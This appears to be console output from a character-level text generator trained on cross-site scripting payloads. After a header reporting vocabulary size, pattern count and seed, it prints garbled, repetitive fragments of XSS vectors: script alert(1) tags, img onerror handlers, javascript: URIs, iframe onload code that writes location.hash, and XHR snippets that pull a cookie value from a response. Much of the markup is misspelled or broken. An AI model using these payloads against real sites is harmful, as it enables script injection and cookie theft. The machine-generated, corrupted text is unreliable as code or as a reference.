[*] Total Characters: 36896
[*] Total Vocab: 116
[*] Total Patterns: 36884
[*] Seed: 'mlns:xlink="'

http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml-stylesheet type="text/ cols="50"
</iframe>#<iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> doc
8%29;},%20true%29;%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared
t type="text/ cols="50" rows="10"></textarea><script>ta.appendChild(clone); alert(tasult.iterateNext().data.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>'%2Blo
><a xlink:href="data:image/svg+xml,%3Csvg 20xmlns%3D%22http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@import'test.css?]{color
0072\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u0074\u0064\u00
kie is ' %2B x);    else     console.log(doc); var xesult = xpe.evaaueNSReeolvart(){" {alue="anmii"    aonmole(log(doc); var xesult = xpe.evaaueNSReeolvart(){" {alue="anmii"    aonmole(log(doc); var x
oll=alert(1)></d>"><!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=%22xrite('<script>'%2Blocation.hash)substr(1)) }</script><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function()
sition:absolute;" onclick="alert(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><scrip
s==200)29{alert%28xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElem
)>/script>">script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<scrip
script[c]:alert(1)"><xoct  ieth="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?xml
2http%3A%2F%2Fwwwle%3E%3C%2Fscript%3Ealert(1)%3C/script%3E%3C/xsl:transform%versson="1</"frol="wsitet-></forl>
<utyle>*[{}@import'test.css?]{color: green;}</style>X
<div style="font-family:'sans\27\2F
mbed src="javascript:alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script
pt,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script> var+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};t
sl:stylesheet> <form action="" method="post"><input name="injected" value="injected" value="injected" value="injected" value="injected" value="injected" value="injected" value="injected" value="inject
&#108&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102&#102
h:800px;height:100px"><ioage xmlns:xrn:schemas-microsoft-com:time style=behavior:url(#default#tmm);position:absolute;" onclick="alert(1)">
<a href="javascript:alert(1)</script>"><! foo="><script>alert
99/xltnl">	#x61;l&#x65;rt&#40;1)</script>
>script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%div2").innerHTML;</script>
<script> document.getElementById(%di
dy>
<?xml version="1.0" smlns:xsl="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <almment aateoetype="sostpe"/>
<?x
};      var event = doc.createEvent('MouseEvent'){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test=new+MouseEvent(){};test
:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><xoct  ieth="http://www.w3.org/1000/svg"><scth d="M0,0" style="madghroond:jrdy"><iframe srl="224<4%25 20%62%65%65%65%65%75%65%75%65%)5 %6 %6  6 <alm
_alert };x.apply(null, a);(function+( { alert(xhr.responseText.substr(150,41));}</script>
x”</title><img src=xx:x onerror=alert(1)>/script>">script> document.getElementById(%div2").innerHTML;</scrip
A&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGhAblgKUTxc2JlbWQ022gWxa>
2[2xhcll>
<<parapt>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"><! foo="><scri
h(/dookie = '(.*?)'/)[1]) };xhr.send();
<textarea id=ta onfocus=%22write('<script>'%2Blocation.hash)substr(1)) }</script><iframe src="22javascript:plene(1) >a</dutton>
<mvent-socrio = function() { ale

[*] done
